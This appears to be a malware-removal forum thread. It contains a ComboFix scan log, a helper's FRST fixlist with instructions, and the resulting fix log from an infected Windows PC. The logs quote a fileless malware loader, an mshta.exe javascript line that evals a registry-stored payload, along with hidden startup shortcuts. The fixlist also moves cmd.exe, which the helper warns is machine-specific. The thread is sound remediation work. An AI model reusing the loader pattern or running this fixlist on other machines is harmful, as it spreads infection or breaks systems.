2016-07-26 09:25 . 2013-09-16 19:24    651032    —-a-w-    c:\programdata\Microsoft\ClickToRun\{9AC08E99-230B-47e8-9721-4577B7F124EA}\integrator.exe
2016-07-08 15:37 . 2016-08-11 03:26    95464    —-a-w-    c:\windows\system32\drivers\ksecdd.sys
2016-07-08 15:37 . 2016-08-11 03:26    154856    —-a-w-    c:\windows\system32\drivers\ksecpkg.sys
2016-07-08 15:32 . 2016-08-17 14:26    2048    —-a-w-    c:\windows\system32\tzres.dll
2016-07-08 15:32 . 2016-08-11 03:26    86528    —-a-w-    c:\windows\system32\TSpkg.dll
2016-07-08 15:32 . 2016-08-11 03:26    210432    —-a-w-    c:\windows\system32\wdigest.dll
2016-07-08 15:32 . 2016-08-11 03:26    135680    —-a-w-    c:\windows\system32\sspicli.dll
2016-07-08 15:32 . 2016-08-11 03:26    28672    —-a-w-    c:\windows\system32\sspisrv.dll
2016-07-08 15:32 . 2016-08-11 03:26    343552    —-a-w-    c:\windows\system32\schannel.dll
2016-07-08 15:32 . 2016-08-11 03:26    190464    —-a-w-    c:\windows\system32\rpchttp.dll
2016-07-08 15:32 . 2016-08-11 03:26    1212928    —-a-w-    c:\windows\system32\rpcrt4.dll
2016-07-08 15:32 . 2016-08-11 03:26    28160    —-a-w-    c:\windows\system32\secur32.dll
2016-07-08 15:32 . 2016-08-11 03:26    316416    —-a-w-    c:\windows\system32\msv1_0.dll
2016-07-08 15:32 . 2016-08-11 03:26    312320    —-a-w-    c:\windows\system32\ncrypt.dll
2016-07-08 15:32 . 2016-08-11 03:26    60416    —-a-w-    c:\windows\system32\msobjs.dll
2016-07-08 15:32 . 2016-08-11 03:26    146432    —-a-w-    c:\windows\system32\msaudite.dll
2016-07-08 15:32 . 2016-08-11 03:26    1464320    —-a-w-    c:\windows\system32\lsasrv.dll
2016-07-08 15:32 . 2016-08-11 03:26    730624    —-a-w-    c:\windows\system32\kerberos.dll
2016-07-08 15:32 . 2016-08-11 03:26    43520    —-a-w-    c:\windows\system32\cryptbase.dll
2016-07-08 15:32 . 2016-08-11 03:26    22016    —-a-w-    c:\windows\system32\credssp.dll
2016-07-08 15:32 . 2016-08-11 03:26    463872    —-a-w-    c:\windows\system32\certcli.dll
2016-07-08 15:32 . 2016-08-11 03:26    690688    —-a-w-    c:\windows\system32\adtschema.dll
2016-07-08 15:17 . 2016-08-11 03:26    96768    —-a-w-    c:\windows\SysWow64\sspicli.dll
2016-07-08 15:17 . 2016-08-11 03:26    666112    —-a-w-    c:\windows\SysWow64\rpcrt4.dll
2016-07-08 15:16 . 2016-08-17 14:26    2048    —-a-w-    c:\windows\SysWow64\tzres.dll
2016-07-08 15:16 . 2016-08-11 03:26    172032    —-a-w-    c:\windows\SysWow64\wdigest.dll
2016-07-08 15:16 . 2016-08-11 03:26    65536    —-a-w-    c:\windows\SysWow64\TSpkg.dll
2016-07-08 15:16 . 2016-08-11 03:26    251392    —-a-w-    c:\windows\SysWow64\schannel.dll
2016-07-08 15:16 . 2016-08-11 03:26    22016    —-a-w-    c:\windows\SysWow64\secur32.dll
2016-07-08 15:16 . 2016-08-11 03:26    141312    —-a-w-    c:\windows\SysWow64\rpchttp.dll
2016-07-08 15:16 . 2016-08-11 03:26    223232    —-a-w-    c:\windows\SysWow64\ncrypt.dll
2016-07-08 15:16 . 2016-08-11 03:26    260608    —-a-w-    c:\windows\SysWow64\msv1_0.dll
2016-07-08 15:16 . 2016-08-11 03:26    60416    —-a-w-    c:\windows\SysWow64\msobjs.dll
2016-07-08 15:16 . 2016-08-11 03:26    146432    —-a-w-    c:\windows\SysWow64\msaudite.dll
2016-07-08 15:16 . 2016-08-11 03:26    553472    —-a-w-    c:\windows\SysWow64\kerberos.dll
2016-07-08 15:16 . 2016-08-11 03:26    17408    —-a-w-    c:\windows\SysWow64\credssp.dll
2016-07-08 15:16 . 2016-08-11 03:26    342528    —-a-w-    c:\windows\SysWow64\certcli.dll
2016-07-08 15:16 . 2016-08-11 03:26    690688    —-a-w-    c:\windows\SysWow64\adtschema.dll
2016-07-08 15:03 . 2016-08-11 03:26    64000    —-a-w-    c:\windows\system32\auditpol.exe
2016-07-08 15:01 . 2016-08-11 03:25    3218944    —-a-w-    c:\windows\system32\win32k.sys
2016-07-08 14:57 . 2016-08-11 03:26    159744    —-a-w-    c:\windows\system32\drivers\mrxsmb.sys
2016-07-08 14:56 . 2016-08-11 03:26    291328    —-a-w-    c:\windows\system32\drivers\mrxsmb10.sys
2016-07-08 14:56 . 2016-08-11 03:26    129536    —-a-w-    c:\windows\system32\drivers\mrxsmb20.sys
2016-07-08 14:55 . 2016-08-11 03:26    30720    —-a-w-    c:\windows\system32\lsass.exe
2016-07-08 14:55 . 2016-08-11 03:26    50176    —-a-w-    c:\windows\SysWow64\auditpol.exe
2016-07-08 14:50 . 2016-08-11 03:26    36352    —-a-w-    c:\windows\SysWow64\cryptbase.dll
2016-07-07 08:30 . 2011-03-29 01:36    24800    —-a-w-    c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2016-07-06 22:19 . 2013-03-13 00:41    1167568    —-a-w-    c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive1]
@="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
[HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
2013-09-16 19:30    222712    —-a-w-    c:\users\james\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive2]
@="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
[HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
2013-09-16 19:30    222712    —-a-w-    c:\users\james\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive3]
@="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
[HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
2013-09-16 19:30    222712    —-a-w-    c:\users\james\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\SkyDriveShell.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]
"StartCCC"="c:\program files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2012-01-27 343168]
"LaunchHPOSIAPP"="c:\program files (x86)\Hewlett-Packard\HP Keyboard\LaunchApp.exe" [2009-04-04 385024]
.
c:\users\james\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
f35faa2c.lnk - c:\windows\System32\cmd.exe /C start "" "c:\users\james\AppData\Roaming\c252533c\72a3ac0f.27d3abaee" [2010-11-20 345088]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]
@="Service"
.
R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]
R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]
R3 EMVSCARD;EMVSCARD;c:\windows\system32\Drivers\EMVSCARD.sys;c:\windows\SYSNATIVE\Drivers\EMVSCARD.sys [x]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys;c:\windows\SYSNATIVE\DRIVERS\NisDrvWFP.sys [x]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe;c:\program files\Microsoft Security Client\NisSrv.exe [x]
R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]
R3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys;c:\windows\SYSNATIVE\drivers\TsUsbGD.sys [x]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]
R4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\Windows Live\Mesh\wlcrasvc.exe;c:\program files\Windows Live\Mesh\wlcrasvc.exe [x]
S0 amd_sata;amd_sata;c:\windows\system32\drivers\amd_sata.sys;c:\windows\SYSNATIVE\drivers\amd_sata.sys [x]
S0 amd_xata;amd_xata;c:\windows\system32\drivers\amd_xata.sys;c:\windows\SYSNATIVE\drivers\amd_xata.sys [x]
S2 AERTFilters;Andrea RT Filters Service;c:\program files\Realtek\Audio\HDA\AERTSr64.EXE;c:\program files\Realtek\Audio\HDA\AERTSr64.EXE [x]
S2 AMD External Events Utility;AMD External Events Utility;c:\windows\system32\atiesrxx.exe;c:\windows\SYSNATIVE\atiesrxx.exe [x]
S2 c2cautoupdatesvc;Skype Click to Call Updater;c:\program files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe;c:\program files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe [x]
S2 c2cpnrsvc;Skype Click to Call PNR Service;c:\program files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe;c:\program files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe [x]
S2 CalendarSynchService;CalendarSynchService;c:\program files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe;c:\program files (x86)\Hewlett-Packard\TouchSmart\Calendar\Service\GCalService.exe [x]
S2 ClickToRunSvc;Microsoft Office ClickToRun Service;c:\program files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe;c:\program files\Microsoft Office 15\ClientX64\OfficeClickToRun.exe [x]
S2 DiagTrack;Diagnostics Tracking Service;c:\windows\System32\svchost.exe;c:\windows\SYSNATIVE\svchost.exe [x]
S2 HP Support Assistant Service;HP Support Assistant Service;c:\program files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe;c:\program files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe [x]
S2 HPClientSvc;HP Client Services;c:\program files\Hewlett-Packard\HP Client Services\HPClientServices.exe;c:\program files\Hewlett-Packard\HP Client Services\HPClientServices.exe [x]
S2 IconMan_R;IconMan_R;c:\program files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe;c:\program files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe [x]
S2 pdfcDispatcher;PDF Document Manager;c:\program files (x86)\PDF Complete\pdfsvc.exe;c:\program files (x86)\PDF Complete\pdfsvc.exe [x]
S2 RtkAudioService;Realtek Audio Service;c:\program files\Realtek\Audio\HDA\RtkAudioService64.exe;c:\program files\Realtek\Audio\HDA\RtkAudioService64.exe [x]
S3 clwvd;CyberLink WebCam Virtual Driver;c:\windows\system32\DRIVERS\clwvd.sys;c:\windows\SYSNATIVE\DRIVERS\clwvd.sys [x]
S3 netr28x;Ralink 802.11n Extensible Wireless Driver;c:\windows\system32\DRIVERS\netr28x.sys;c:\windows\SYSNATIVE\DRIVERS\netr28x.sys [x]
S3 RSPCIESTOR;Realtek PCIE CardReader Driver;c:\windows\system32\DRIVERS\RtsPStor.sys;c:\windows\SYSNATIVE\DRIVERS\RtsPStor.sys [x]
S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]
S3 usbfilter;AMD USB Filter Driver;c:\windows\system32\drivers\usbfilter.sys;c:\windows\SYSNATIVE\drivers\usbfilter.sys [x]
.
.
[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]
LocalServiceAndNoImpersonation    REG_MULTI_SZ       SSDPSRV upnphost SCardSvr QWAVE wcncsvc
.
Contents of the 'Scheduled Tasks' folder
.
2016-09-30 c:\windows\Tasks\HPCeeScheduleForjames.job
- c:\program files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15 11:43]
.
.
——— X64 Entries ———–
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive1]
@="{F241C880-6982-4CE5-8CF7-7085BA96DA5A}"
[HKEY_CLASSES_ROOT\CLSID\{F241C880-6982-4CE5-8CF7-7085BA96DA5A}]
2013-09-16 19:30    261624    —-a-w-    c:\users\james\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\SkyDriveShell64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive2]
@="{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}"
[HKEY_CLASSES_ROOT\CLSID\{A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E}]
2013-09-16 19:30    261624    —-a-w-    c:\users\james\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\SkyDriveShell64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrive3]
@="{BBACC218-34EA-4666-9D7A-C78F2274A524}"
[HKEY_CLASSES_ROOT\CLSID\{BBACC218-34EA-4666-9D7A-C78F2274A524}]
2013-09-16 19:30    261624    —-a-w-    c:\users\james\AppData\Local\Microsoft\SkyDrive\17.0.2003.1112\amd64\SkyDriveShell64.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro1 (ErrorConflict)]
@="{8BA85C75-763B-4103-94EB-9470F12FE0F7}"
[HKEY_CLASSES_ROOT\CLSID\{8BA85C75-763B-4103-94EB-9470F12FE0F7}]
2016-08-16 11:54    2351920    —-a-w-    c:\program files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\grooveex.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro2 (SyncInProgress)]
@="{CD55129A-B1A1-438E-A425-CEBC7DC684EE}"
[HKEY_CLASSES_ROOT\CLSID\{CD55129A-B1A1-438E-A425-CEBC7DC684EE}]
2016-08-16 11:54    2351920    —-a-w-    c:\program files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\grooveex.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ SkyDrivePro3 (InSync)]
@="{E768CD3B-BDDC-436D-9C13-E1B39CA257B1}"
[HKEY_CLASSES_ROOT\CLSID\{E768CD3B-BDDC-436D-9C13-E1B39CA257B1}]
2016-08-16 11:54    2351920    —-a-w-    c:\program files\Microsoft Office 15\root\vfs\ProgramFilesX64\Microsoft Office\Office15\grooveex.dll
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RTHDVCPL"="c:\program files\Realtek\Audio\HDA\RtkNGUI64.exe" [2014-12-11 7666392]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2016-01-30 1340192]
"RtHDVBg"="c:\program files\Realtek\Audio\HDA\RAVBg64.exe" [2014-12-11 1391472]
.
——- Supplementary Scan ——-
.
uStart Page = hxxp://baynews9.com/content/news/baynews9/weather/klystron-9-radar.map.html/Florida.html
uLocal Page = c:\windows\system32\blank.htm
mLocal Page = c:\windows\SysWOW64\blank.htm
TCP: DhcpNameServer = [removed] [removed] 192.168.1.1
FF - ProfilePath - c:\users\james\AppData\Roaming\Mozilla\Firefox\Profiles\6uizn1ze.default-1451233910488\
FF - prefs.js: browser.startup.homepage - hxxp://baynews9.com/content/news/baynews9/weather/klystron-9-radar.map.html/Florida.html
.
- - - - ORPHANS REMOVED - - - -
.
Wow6432Node-HKLM-Run- - (no file)
AddRemove-{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE} - c:\program files (x86)\InstallShield Installation Information\{E35A3B13-78CD-4967-8AC8-AA9FDA693EDE}\setup.exe
.
.
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\services\pdfcDispatcher]
"ImagePath"="c:\program files (x86)\PDF Complete\pdfsvc.exe /startedbyscm:66B66708-40E2BE4D-pdfcService"
.
——————— LOCKED REGISTRY KEYS ———————
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Office\Common\Smart Tag\Actions\{B7EFF951-E52F-45CC-9EF7-57124F2177CC}]
@Denied: (A) (Everyone)
"Solution"="{15727DE6-F92D-4E46-ACB4-0E2C58B31A18}"
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3]
@Denied: (A) (Everyone)
.
[HKEY_LOCAL_MACHINE\software\Wow6432Node\Microsoft\Schema Library\ActionsPane3\0]
"Key"="ActionsPane3"
"Location"="c:\\Program Files (x86)\\Common Files\\Microsoft Shared\\VSTO\\ActionsPane3.xsd"
.
[HKEY_LOCAL_MACHINE\system\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2016-09-30  18:25:30
ComboFix-quarantined-files.txt  2016-09-30 22:25
.
Pre-Run: 423,715,979,264 bytes free
Post-Run: 423,287,345,152 bytes free
.
- - End Of File - - 556A4A6345251201A77CE08B3A7033F7
A36C5E4F47E84449FF07ED3517B43A31
 

Run Farbar Recovery Scan Tool

Open notepad. Please copy the contents of the code box below and paste it into Notepad.

CloseProcesses:
HKU\S-1-5-21-531013560-757715300-2485835200-1000\…\Run: [**fprfkc<*>] => "C:\Users\james\AppData\Local\ecf2194c\3c77be0a.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\james\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f35faa2c.lnk [2016-09-29]
ShortcutTarget: f35faa2c.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
HKU\S-1-5-21-531013560-757715300-2485835200-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> {3B5C380A-502F-466A-93C1-CEB04D10D2EA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us1-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://www.ebay.com/sch/i.html?_nkw={searchTerms}
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://www.ebay.com/sch/i.html?_nkw={searchTerms}
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-531013560-757715300-2485835200-1000 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://www.ebay.com/sch/i.html?_nkw={searchTerms}
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U3 aswMBR; \??\C:\Users\james\AppData\Local\Temp\aswMBR.sys [X]
U3 aswVmm; \??\C:\Users\james\AppData\Local\Temp\aswVmm.sys [X]
2016-09-29 12:55 - 2016-09-29 12:55 - 00000000 ____D C:\Users\james\AppData\Local\ecf2194c
2015-06-28 21:08 - 2015-06-28 21:28 - 0186023 _____ () C:\Users\james\AppData\Local\ars.cache
2015-06-28 21:08 - 2015-06-28 21:28 - 0456971 _____ () C:\Users\james\AppData\Local\census.cache
2015-06-28 17:27 - 2015-06-28 17:27 - 0000036 _____ () C:\Users\james\AppData\Local\housecall.guid.cache
2015-03-11 16:53 - 2015-03-11 16:53 - 0000089 _____ () C:\Users\james\AppData\Local\msmathematics.qat.james
2014-07-02 13:56 - 2014-07-02 13:56 - 0000017 _____ () C:\Users\james\AppData\Local\resmon.resmoncfg
Shortcut: C:\Users\james\AppData\Local\ecf2194c\3c77be0a.lnk -> C:\Users\james\AppData\Local\ecf2194c\b53a3831.bat ()
HKU\S-1-5-21-531013560-757715300-2485835200-1000\Software\Classes\e3f69a90: "C:\Windows\system32\mshta.exe" "javascript:oiOb1J="6M";bS95=new ActiveXObject("WScript.Shell");Tob6D7kv="I";uV1gR=bS95.RegRead("HKCU\\software\\lvmv\\bkxvzwbkbk");y85nIyo="cftk3ru";eval(uV1gR);mi7b4btT="uOs";" <===== ATTENTION
C:\Users\james\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f35faa2c.lnk
C:\Users\james\AppData\Local\ars.cache
C:\Users\james\AppData\Local\census.cache
C:\Users\james\AppData\Local\housecall.guid.cache
C:\Users\james\AppData\Local\msmathematics.qat.james
C:\Users\james\AppData\Local\resmon.resmoncfg
EmptyTemp:

NOTE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

  • save the files as fixlist.txt in the same folder as FRST – NOTE: It's important that both files, FRST and fixlist.txt are in the same location or the fix will not work
  • run FRST64 then click Fix just once and wait
  • it will create a log on your desktop, (Fixlog.txt); please post it to your reply.

Please run FRST again and send the new log.

Logs to include with next post:

Fixlog.txt
New FRST.txt


Thanks

Satchfan

 

Fix result of Farbar Recovery Scan Tool (x64) Version: 28-09-2016
Ran by [removed] (01-10-2016 09:35:39) Run:1
Running from C:\Users\[removed]\Desktop
[removed] Boot Mode: Normal
==============================================

fixlist content:
*****************
CloseProcesses:
HKU\S-1-5-21-531013560-757715300-2485835200-1000\…\Run: [**fprfkc<*>] => "C:\Users\james\AppData\Local\ecf2194c\3c77be0a.lnk" <===== ATTENTION (Value Name with invalid characters)
Startup: C:\Users\james\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f35faa2c.lnk [2016-09-29]
ShortcutTarget: f35faa2c.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
HKU\S-1-5-21-531013560-757715300-2485835200-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
SearchScopes: HKLM -> {3B5C380A-502F-466A-93C1-CEB04D10D2EA} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag;=hp-us1-vsb-20&link;%5Fcode=qs&index;=aps&field-keywords;={searchTerms}
SearchScopes: HKLM -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://www.ebay.com/sch/i.html?_nkw={searchTerms}
SearchScopes: HKLM-x32 -> {d43b3890-80c7-4010-a95d-1e77b5924dc3} URL = hxxp://en.wikipedia.org/wiki/Special:Search?search={searchTerms}
SearchScopes: HKLM-x32 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://www.ebay.com/sch/i.html?_nkw={searchTerms}
SearchScopes: HKU\.DEFAULT -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-19 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-20 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-531013560-757715300-2485835200-1000 -> {D944BB61-2E34-4DBF-A683-47E505C587DC} URL = hxxp://rover.ebay.com/rover/1/711-30572-11896-1/4?mpre=hxxp://www.ebay.com/sch/i.html?_nkw={searchTerms}
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U3 aswMBR; \??\C:\Users\james\AppData\Local\Temp\aswMBR.sys [X]
U3 aswVmm; \??\C:\Users\james\AppData\Local\Temp\aswVmm.sys [X]
2016-09-29 12:55 - 2016-09-29 12:55 - 00000000 ____D C:\Users\james\AppData\Local\ecf2194c
2015-06-28 21:08 - 2015-06-28 21:28 - 0186023 _____ () C:\Users\james\AppData\Local\ars.cache
2015-06-28 21:08 - 2015-06-28 21:28 - 0456971 _____ () C:\Users\james\AppData\Local\census.cache
2015-06-28 17:27 - 2015-06-28 17:27 - 0000036 _____ () C:\Users\james\AppData\Local\housecall.guid.cache
2015-03-11 16:53 - 2015-03-11 16:53 - 0000089 _____ () C:\Users\james\AppData\Local\msmathematics.qat.james
2014-07-02 13:56 - 2014-07-02 13:56 - 0000017 _____ () C:\Users\james\AppData\Local\resmon.resmoncfg
Shortcut: C:\Users\james\AppData\Local\ecf2194c\3c77be0a.lnk -> C:\Users\james\AppData\Local\ecf2194c\b53a3831.bat ()
HKU\S-1-5-21-531013560-757715300-2485835200-1000\Software\Classes\e3f69a90: "C:\Windows\system32\mshta.exe" "javascript:oiOb1J="6M";bS95=new ActiveXObject("WScript.Shell");Tob6D7kv="I";uV1gR=bS95.RegRead("HKCU\\software\\lvmv\\bkxvzwbkbk");y85nIyo="cftk3ru";eval(uV1gR);mi7b4btT="uOs";" <===== ATTENTION
C:\Users\james\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f35faa2c.lnk
C:\Users\james\AppData\Local\ars.cache
C:\Users\james\AppData\Local\census.cache
C:\Users\james\AppData\Local\housecall.guid.cache
C:\Users\james\AppData\Local\msmathematics.qat.james
C:\Users\james\AppData\Local\resmon.resmoncfg
EmptyTemp:
*****************

Processes closed successfully.
HKU\S-1-5-21-531013560-757715300-2485835200-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**fprfkc<*> => value removed successfully
C:\Users\james\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\f35faa2c.lnk => moved successfully
C:\Windows\System32\cmd.exe => moved successfully
"HKU\S-1-5-21-531013560-757715300-2485835200-1000\SOFTWARE\Policies\Microsoft\Internet Explorer" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{3B5C380A-502F-466A-93C1-CEB04D10D2EA}" => key removed successfully
HKCR\CLSID\{3B5C380A-502F-466A-93C1-CEB04D10D2EA} => key not found.
"HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}" => key removed successfully
HKCR\CLSID\{D944BB61-2E34-4DBF-A683-47E505C587DC} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{d43b3890-80c7-4010-a95d-1e77b5924dc3}" => key removed successfully
HKCR\Wow6432Node\CLSID\{d43b3890-80c7-4010-a95d-1e77b5924dc3} => key not found.
"HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}" => key removed successfully
HKCR\Wow6432Node\CLSID\{D944BB61-2E34-4DBF-A683-47E505C587DC} => key not found.
HKU\.DEFAULT\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value not found.
HKU\S-1-5-19\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
HKU\S-1-5-20\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value removed successfully
"HKU\S-1-5-21-531013560-757715300-2485835200-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{D944BB61-2E34-4DBF-A683-47E505C587DC}" => key removed successfully
HKCR\CLSID\{D944BB61-2E34-4DBF-A683-47E505C587DC} => key not found.
catchme => service removed successfully
aswMBR => service not found.
aswVmm => service not found.
C:\Users\james\AppData\Local\ecf2194c => moved successfully
C:\Users\james\AppData\Local\ars.cache => moved successfully
C:\Users\james\AppData\Local\census.cache => moved successfully
C:\Users\james\AppData\Local\housecall.guid.cache => moved successfully
C:\Users\james\AppData\Local\msmathematics.qat.james => moved successfully
C:\Users\james\AppData\Local\resmon.resmoncfg => moved successfully
C:\Users\james\AppData\Local\ecf2194c\3c77be0a.lnk => not found.
"HKU\S-1-5-21-531013560-757715300-2485835200-1000\Software\Classes\e3f69a90" => key removed successfully
